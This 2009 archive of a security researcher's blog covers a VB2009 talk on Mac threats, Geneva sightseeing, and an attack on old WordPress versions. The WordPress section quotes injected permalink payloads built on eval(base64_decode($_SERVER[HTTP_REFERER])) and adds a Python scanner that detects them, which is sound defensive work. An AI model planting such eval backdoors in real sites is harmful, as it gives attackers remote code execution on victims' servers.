Archive for September, 2009

VB2009

September 25, 2009

I should have posted this content here as well.

So, the presentation has a different twist on what I have written in the whitepaper. I started by building an understanding of Mac security in my introduction, leading the context into an analysis of the specific threat families. This was followed by a macro analysis that broadened the perspective to the attackers’ underlying business models, the competitive advantages they bring in constructing the means and motive, and how these aspects create the opportunity that enables these organized groups to perform and deploy threats and attacks against Mac users.

While the momentum of interest and excitement was increasing, my presentation suddenly froze and a crash report popped up. Indeed, an ice breaker as I continued to deliver the remaining slides.

At the end, the presentation shared some actual infection reports and showed data on how successful these threats are at penetrating this platform.

It was a great experience, and at the same time I got to meet fellow researchers at this conference!

Greetings from Geneva!

Jet d'eau

Jet d’eau (Water Fountain) as taken this morning. It was hot and sunny here in Geneva, so it’s the best time to walk around, take some pictures and chill out after taking a good rest and recovering from the long trip from Melbourne.

St. Pierre Cathedral

St. Pierre Cathedral is a cathedral in Geneva, Switzerland, belonging to the Swiss Reformed Church.

Wor{d|m}press

It’s a really tedious job to update and, perhaps, patch from time to time. I should say, security comes with a great responsibility, just like parking your car in the right place or locking your valuable computer when leaving.

Last week, users running older versions of WordPress noticed unusual strings added to their blogs’ permalinks, which made blog post links stop working.

journeyetc.com responded and described the attack:

“If you use wordpress, you should check ASAP your blog’s permalinks/rss feed.
If they are broken and look like this
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
or
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
or
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’ for your feed
then you are the victim of the new hack attempt targeting our blogs.”

Affected users now face the dilemma of upgrading and cleaning up. The SQL injection attack leaves a backdoor which, even after upgrading, may allow a remote attacker to get in. I recommend further reading in this post, “Old WordPress versions under attack” by Lorelle.
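A defender-side check for the indicators quoted above, as an added example that is not from the original post or from journeyetc.com: it percent-decodes each link, repeatedly so double-encoded variants are caught, and looks for the code-execution markers visible in those strings. The host blog.example, the sample links and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Markers visible in the strings quoted above, matched after percent-decoding.
MARKERS = {
    "eval": re.compile(r"eval\s*\(", re.I),
    "base64_decode": re.compile(r"base64_decode\s*\(", re.I),
    "server_header": re.compile(r"\$_SERVER\s*\[\s*['\"]?HTTP_[A-Z_]+", re.I),
    "nested_braces": re.compile(r"\{\s*\$\s*\{"),
}

# Constructed sample links; blog.example is a placeholder host.
SAMPLE_LINKS = [
    "http://blog.example/2009/09/vb2009/",
    "http://blog.example/2009/09/evaluation-of-tools/",
    "http://blog.example/2009/09/post/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/",
    "http://blog.example/feed/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%",
    "http://blog.example/p/%257B$%257Beval(base64_decode(x))%257D%257D",
]

def decode_fully(text, max_rounds=5):
    """Percent-decode until stable so double-encoded links are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def check_link(link):
    """Return the sorted names of the markers found in one link."""
    text = decode_fully(link)
    return sorted(name for name, rx in MARKERS.items() if rx.search(text))

def scan(links):
    """Map each suspicious link to its markers; clean links are omitted."""
    report = {}
    for link in links:
        hits = check_link(link)
        if hits:
            report[link] = hits
    return report

if __name__ == "__main__":
    for link, hits in scan(SAMPLE_LINKS).items():
        print(", ".join(hits), "<-", link)
```

Feed it the links extracted from a blog's own pages and RSS feed; a slug such as "evaluation-of-tools" is not flagged because the markers require the opening parenthesis.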

Bandwagon effect

Google.com/trends allows you to check popular searches or trends that threats might take advantage of as well.

However, you don’t often check it, and for events like “Station Fire”, which I just learned about from the news this morning (here in Melbourne), it’s good that there are concerned Mac users who send you a heads up!

As a result, I’ve published this post.